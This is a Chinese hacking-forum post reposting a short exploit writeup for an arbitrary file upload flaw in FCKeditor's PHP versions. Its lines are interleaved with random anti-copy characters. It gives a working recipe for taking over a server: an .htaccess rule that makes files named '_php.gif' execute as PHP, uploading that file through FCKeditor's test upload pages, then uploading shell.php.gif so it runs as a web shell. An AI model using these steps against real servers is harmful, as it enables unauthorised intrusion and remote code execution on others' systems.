找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2263|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞
  Z0 r7 O% J3 ~) P& |作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07) @: d" V8 U4 ]9 [
减小字体 增大字体
$ F: O$ |& ]$ L[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
6 J- w# o& u7 R) D8 R6 y+ Q[+] Date: 2011$ B! w: w) I  o' D3 Z8 O
[+] Author : sinesafe.cn& T9 A! z  {/ [2 G6 m
[+] Website : WwW.sinesafe.cn
8 J& i! S) J- |* d' N$ e, _8 d———————————————————  R* N7 h; a' u4 r" c
1.create a htaccess file:( g! @8 Z; c) J" _* P& i$ }
code:7 y: T! I+ s& r9 w. P& Z
<FilesMatch “_php.gif”>- `  z3 N# b# u4 P5 u
SetHandler application/x-httpd-php0 H6 O9 \9 e- L) K3 q
</FilesMatch>9 K9 B! {% \' ^2 V4 Q( Q) {
$ p5 s; S" Z( Z( |9 L' W
2.Now upload this htaccess with FCKeditor., A+ e. b. |, M$ z! h: ?8 G
& c# g8 \  j$ S, x* D
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html( `8 G) y1 U7 h1 S
4 N4 G$ z. k( E( _
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html: f" H* V! L4 P* Y% u
; K+ X! J/ c+ e1 N4 h; i1 n0 t
———————————————————————————————-4 m2 J0 l- `% I6 K: {+ C+ K1 x+ y
3.Now upload shell.php.gif with FCKeditor./ D$ e- w& D+ ?+ q: ~2 ~* `9 }) X
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
% i9 X" {. G" K& v3 E3 |# C5.http://www.sinesafe.cn/anything/shell_php.gif3 t) N$ W. c9 _$ g7 I% P( g
6.Now shell is available from server.
9 H  a; a: Q5 d
, d5 {3 {( t! l& e5 D  U& C+ I
! P" l: K) L! t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表